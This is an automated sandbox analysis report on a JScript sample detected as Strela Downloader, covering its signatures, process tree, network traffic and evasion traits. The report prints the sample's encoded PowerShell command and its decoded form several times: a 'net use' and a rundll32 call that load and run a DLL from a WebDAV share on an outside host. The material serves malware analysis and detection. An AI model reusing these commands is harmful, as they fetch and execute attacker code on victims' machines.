Windows Analysis Report
171596613219316174.js

Overview

General Information

Sample name: 171596613219316174.js
Analysis ID: 1541208
MD5: f4cf89a037227ea762cc6e1c9b286bf9
SHA1: ba826a2e3023657b2efb471b52bc3425ed012b1f
SHA256: 9df87b2ca3327bdd843e791ae253b81f6ef1eeb765661c2dbea9d3c234a356da
Tags: jsuser-lowmal3

Detection

Strela Downloader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 1852 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 2156 cmdline: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 1672 cmdline: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 712; Rule: JoeSecurity_StrelaDownloader; Description: Yara detected Strela Downloader; Author: Joe Security
    Source: amsi64_712.amsi.csv; Rule: JoeSecurity_StrelaDownloader; Description: Yara detected Strela Downloader; Author: Joe Security

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry, ProcessId: 1672, ProcessName: rundll32.exe
      Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ProcessId: 1852, ProcessName: wscript.exe
      Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 94.159.113.48, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 2156, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49747
      Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1852, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 712, ProcessName: powershell.exe
      Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ProcessId: 1852, ProcessName: wscript.exe
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1852, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ProcessId: 712, ProcessName: powershell.exe
      Source: Process started; Author: frack113; Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 2156, ProcessName: net.exe
      Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\, ProcessId: 2156, ProcessName: net.exe
      No Suricata rule has matched


      Software Vulnerabilities

      Source: 171596613219316174.js; Argument value: ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgA']
      Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Child: C:\Windows\System32\rundll32.exe

      Networking

      Source: unknown; Network traffic detected: HTTP traffic on port 49747 -> 8888
      Source: unknown; Network traffic detected: HTTP traffic on port 8888 -> 49747
      Source: global traffic; TCP traffic: 192.168.2.9:49747 -> 94.159.113.48:8888
      Source: Joe Sandbox View; IP Address: 94.159.113.48
      Source: Joe Sandbox View; ASN Name: NETCOM-R-ASRU
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic; DNS traffic detected: DNS query: apitestlabs.com
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405345735.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405796900.0000015D70E1C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://apitestlabs.com:8888/
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://apitestlabs.com:8888/N
      Source: net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://apitestlabs.com:8888/~
      Source: powershell.exe, 00000002.00000002.1408331750.000001898B391000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1408331750.000001898B3F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1408331750.000001898B3DD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68

      Spam, unwanted Advertisements and Ransom Demands

      Source: Yara match; File source: amsi64_712.amsi.csv, type: OTHER
      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 712, type: MEMORYSTR

      System Summary

      Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkA
      Source: 171596613219316174.js; Initial sample: Strings found which are bigger than 50
      Source: classification engine; Classification label: mal92.rans.troj.spyw.expl.evad.winJS@8/3@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1872:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaru0nwp.yf5.ps1
      Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
      Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\171596613219316174.js"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exe; Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: jscript.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe; Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
      Source: C:\Windows\System32\net.exe; Section loaded: mpr.dll
      Source: C:\Windows\System32\net.exe; Section loaded: wkscli.dll
      Source: C:\Windows\System32\net.exe; Section loaded: netutils.dll
      Source: C:\Windows\System32\net.exe; Section loaded: samcli.dll
      Source: C:\Windows\System32\net.exe; Section loaded: srvcli.dll
      Source: C:\Windows\System32\net.exe; Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\net.exe; Section loaded: drprov.dll
      Source: C:\Windows\System32\net.exe; Section loaded: winsta.dll
      Source: C:\Windows\System32\net.exe; Section loaded: ntlanman.dll
      Source: C:\Windows\System32\net.exe; Section loaded: davclnt.dll
      Source: C:\Windows\System32\net.exe; Section loaded: davhlpr.dll
      Source: C:\Windows\System32\net.exe; Section loaded: winhttp.dll
      Source: C:\Windows\System32\net.exe; Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\net.exe; Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\net.exe; Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\net.exe; Section loaded: webio.dll
      Source: C:\Windows\System32\net.exe; Section loaded: mswsock.dll
      Source: C:\Windows\System32\net.exe; Section loaded: winnsi.dll
      Source: C:\Windows\System32\net.exe; Section loaded: sspicli.dll
      Source: C:\Windows\System32\net.exe; Section loaded: dnsapi.dll
      Source: C:\Windows\System32\net.exe; Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\net.exe; Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: 171596613219316174.js; Static file information: File size 1418795 > 1048576

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exe; Anti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGw", "0", "false")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FF886C61A69 push ds; iretd 2_2_00007FF886C61A6A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FF886C60C0C push ds; iretd 2_2_00007FF886C60C22
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FF886C602FD push ds; iretd 2_2_00007FF886C603E2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FF886C60C23 push ds; iretd 2_2_00007FF886C60C22

      Hooking and other Techniques for Hiding and Protection

      Source: unknown; Network traffic detected: HTTP traffic on port 49747 -> 8888
      Source: unknown; Network traffic detected: HTTP traffic on port 8888 -> 49747
      Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2105
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1256
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\net.exe TID: 1516 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: net.exe, 00000004.00000002.1405878125.0000015D70E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405408313.0000015D70E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405303577.0000015D70E48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
